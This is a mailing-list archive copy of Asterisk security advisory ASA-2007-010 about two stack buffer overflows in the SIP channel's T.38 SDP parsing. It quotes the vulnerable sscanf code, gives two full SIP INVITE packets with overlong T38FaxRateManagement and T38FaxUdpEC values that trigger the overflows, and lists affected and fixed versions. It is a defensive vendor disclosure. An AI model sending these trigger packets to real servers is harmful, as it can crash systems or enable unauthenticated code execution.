Bugtraq mailing list archives
ASA-2007-010: Two stack buffer overflows in SIP channel's T.38 SDP parsing code
From: "Kevin P. Fleming" <kpfleming () digium com>
Date: Wed, 25 Apr 2007 14:04:11 -0500
Asterisk Project Security Advisory - ASA-2007-010 +------------------------------------------------------------------------+ | Product | Asterisk | |--------------------+---------------------------------------------------| | Summary | Two stack buffer overflows in SIP channel's T.38 | | | SDP parsing code | |--------------------+---------------------------------------------------| | Nature of Advisory | Exploitable Stack Buffer Overflow | |--------------------+---------------------------------------------------| | Susceptibility | Remote Unauthenticated Sessions | |--------------------+---------------------------------------------------| | Severity | Moderate | |--------------------+---------------------------------------------------| | Exploits Known | No | |--------------------+---------------------------------------------------| | Reported On | March 22, 2007 | |--------------------+---------------------------------------------------| | Reported By | Barrie Dempster, NGS Software, | | | <barrie () ngssoftware com> | |--------------------+---------------------------------------------------| | Posted On | April 24, 2007 | |--------------------+---------------------------------------------------| | Last Updated On | April 24, 2007 | |--------------------+---------------------------------------------------| | Advisory Contact | kpfleming () digium com | +------------------------------------------------------------------------+ +------------------------------------------------------------------------------------+ |Description|Two closely related stack based buffer overflows exist in the SIP/SDP | | |handler of Asterisk, the vulnerabilities are very similar but exist as | | |two separate unsafe function calls. The T38FaxRateManagement and | | |T38FaxUdpEC SDP parameters can be exploited remotely leading to | | |arbitrary code execution without authentication. In order for these | | |overflows to occur, t38 fax over SIP must be enabled in sip.conf. | | |Examples of SIP INVITE packets are shown below, however these | | |vulnerabilities can be triggered with a number of different SIP messages| | |affecting calls received by Asterisk, or in response to calls made by | | |Asterisk. | | | | | |Remote Unauthenticated stack overflow in Asterisk SIP/SDP | | |T38FaxRateManagement parameter | | | | | |A remote unauthenticated stack overflow exists in the SIP/SDP handler of| | |Asterisk. By sending a SIP packet with SDP data which includes an overly| | |long T38 parameter it is possible to overflow a stack based buffer and | | |execute arbitrary code. | | | | | |The process_sdp function of chan_sip.c in Asterisk contains the | | |following vulnerable call to sscanf. | | | | | |else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) { | | | | | |found = 1; | | | | | |if (option_debug > 2) | | | | | |ast_log(LOG_DEBUG, "RateMangement: %s\n", s); | | | | | |if (!strcasecmp(s, "localTCF")) | | | | | |peert38capability |= | | | | | |T38FAX_RATE_MANAGEMENT_LOCAL_TCF; | | | | | |else if (!strcasecmp(s, "transferredTCF")) | | | | | |peert38capability |= | | | | | |T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF; | | | | | |This attempts to read the "T38FaxRateManagement:" option from the SDP | | |within a SIP packet and copy the succeeding string into "s". There are | | |no checks on the length of this string and we can therefore write past | | |the boundaries of the "s" variable overwriting adjacent memory on the | | |stack. "s" is defined earlier in this function as being a character | | |array of only 256 bytes. The following example packet demonstrates an | | |overflow of this parameter: | | | | | |INVITE sip:200@127.0.0.1 SIP/2.0 | | | | | |Date: Wed, 21 Mar 2007 4:20:09 GMT | | | | | |CSeq: 1 INVITE | | | | | |Via: SIP/2.0/UDP | | | | | |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport| | | | | |User-Agent: NGS/2.0 | | | | | |From: "Barrie Dempster" | | | | | |<sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 | | | | | |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades | | | | | |To: <sip:200@localhost> | | | | | |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp> | | | | | |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE | | | | | |Content-Type: application/sdp | | | | | |Content-Length: 796 | | | | | |Max-Forwards: 70 | | | | | |v=0 | | | | | |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1 | | | | | |s=- | | | | | |c=IN IP4 127.0.0.1 | | | | | |t=0 0 | | | | | |m=image 5004 UDPTL t38 | | | | | |a=T38FaxVersion:0 | | | | | |a=T38MaxBitRate:14400 | | | | | |a=T38FaxMaxBuffer:1024 | | | | | |a=T38FaxMaxDatagram:238 | | | | | |a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAA | | | | | |a=T38FaxUdpEC:t38UDPRedundancy | | | | | |------------------------------------------------- | | | | | |Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxUdpEC | | |parameter | | | | | |A remote unauthenticated stack overflow exists in the SIP/SDP handler of| | |Asterisk. By sending a SIP packet with SDP data which includes an overly| | |long T38FaxUdpEC parameter it is possible to overflow a stack based | | |buffer and execute arbitrary code. | | | | | |The process_sdp function of chan_sip.c in Asterisk contains the | | |following vulnerable call to sscanf. | | | | | |else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) { | | | | | |found = 1; | | | | | |if (option_debug > 2) | | | | | |ast_log(LOG_DEBUG, "UDP EC: %s\n", s); | | | | | |if (!strcasecmp(s, "t38UDPRedundancy")) { | | | | | |peert38capability |= | | | | | |T38FAX_UDP_EC_REDUNDANCY; | | | | | |ast_udptl_set_error_correction_scheme(p->udptl, | | | | | |UDPTL_ERROR_CORRECTION_REDUNDANCY); | | | | | |This attempts to read the "T38FaxUdpEC:" option from the SDP within a | | |SIP packet and copy the succeeding string into "s". There are no checks | | |on the length of this string and we can therefore write past the | | |boundaries of the "s" variable overwriting adjacent memory on the stack.| | |"s" is defined earlier in this function as being a character array of | | |only 256 bytes. The following example packet demonstrates an overflow of| | |this parameter: | | | | | |INVITE sip:200@127.0.0.1 SIP/2.0 | | | | | |Date: Wed, 21 Mar 2007 4:20:09 GMT | | | | | |CSeq: 1 INVITE | | | | | |Via: SIP/2.0/UDP | | | | | |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport| | | | | |User-Agent: NGS/2.0 | | | | | |From: "Barrie Dempster" | | | | | |<sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 | | | | | |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades | | | | | |To: <sip:200@localhost> | | | | | |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp> | | | | | |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE | | | | | |Content-Type: application/sdp | | | | | |Content-Length: 796 | | | | | |Max-Forwards: 70 | | | | | |v=0 | | | | | |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1 | | | | | |s=- | | | | | |c=IN IP4 127.0.0.1 | | | | | |t=0 0 | | | | | |m=image 5004 UDPTL t38 | | | | | |a=T38FaxVersion:0 | | | | | |a=T38MaxBitRate:14400 | | | | | |a=T38FaxMaxBuffer:1024 | | | | | |a=T38FaxMaxDatagram:238 | | | | | |a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | | | | | |AAAAAAAAA | +------------------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Resolution | T.38 support in the affected versions of Asterisk is not | | | enabled by default, therefore the severity of this issue | | | is 'moderate'. | | | | | | Users who are using the default configuration with | | | 't38_udptl' set to 'no' or an equivalent value are not | | | susceptible to this vulnerability. Users who have set | | | this configuration item to 'yes' or an equivalent value | | | but are not actually using T.38 support can set it to | | | 'no' to secure their systems against this vulnerability. | | | | | | All other users are urged to upgrade to the appropriate | | | version of their Asterisk product listed in the | | | 'Corrected In' section below. | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Affected Versions | |------------------------------------------------------------------------| | Product | Release | | | | Series | | |------------------------------+-------------+---------------------------| | Asterisk Open Source | 1.0.x | not affected; does not | | | | contain T.38 support | |------------------------------+-------------+---------------------------| | Asterisk Open Source | 1.2.x | not affected, does not | | | | contain T.38 support | |------------------------------+-------------+---------------------------| | Asterisk Open Source | 1.4.x | all releases prior to | | | | 1.4.3 | |------------------------------+-------------+---------------------------| | Asterisk Business Edition | A.x.x | not affected, does not | | | | contain T.38 support | |------------------------------+-------------+---------------------------| | Asterisk Business Edition | B.x.x | not affected, does not | | | | contain T.38 support | |------------------------------+-------------+---------------------------| | AsteriskNOW | pre-release | all releases prior to and | | | | including Beta 5 | |------------------------------+-------------+---------------------------| | Asterisk Appliance Developer | 0.x.x | all releases prior to | | Kit | | 0.4.0 | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Corrected In | |------------------------------------------------------------------------| | Product | Release | |--------------------+---------------------------------------------------| | Asterisk Open | 1.4.3, available from | | Source | ftp://ftp.digium.com/pub/telephony/asterisk | |--------------------+---------------------------------------------------| | AsteriskNOW | Beta 6, when available from | | | http://www.asterisknow.org, Beta 5 users can use | | | use 'System Update' in the appliance control | | | panel to update their version of AsteriskNOW | |--------------------+---------------------------------------------------| | Asterisk Appliance | 0.4.0, available from | | Developer Kit | ftp://ftp.digium.com/pub/telephony/aadk | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Links | | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Asterisk Project Security Advisories are posted at | | http://www.asterisk.org/security. | | | | This document may be superseded by later versions; if so, the latest | | version will be posted at | | http://www.asterisk.org/files/ASA-2007-010.pdf. | +------------------------------------------------------------------------+ Asterisk Project Security Advisory - ASA-2007-010 Copyright (c) 2007 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.
Current thread:
- ASA-2007-010: Two stack buffer overflows in SIP channel's T.38 SDP parsing code Kevin P. Fleming (Apr 25)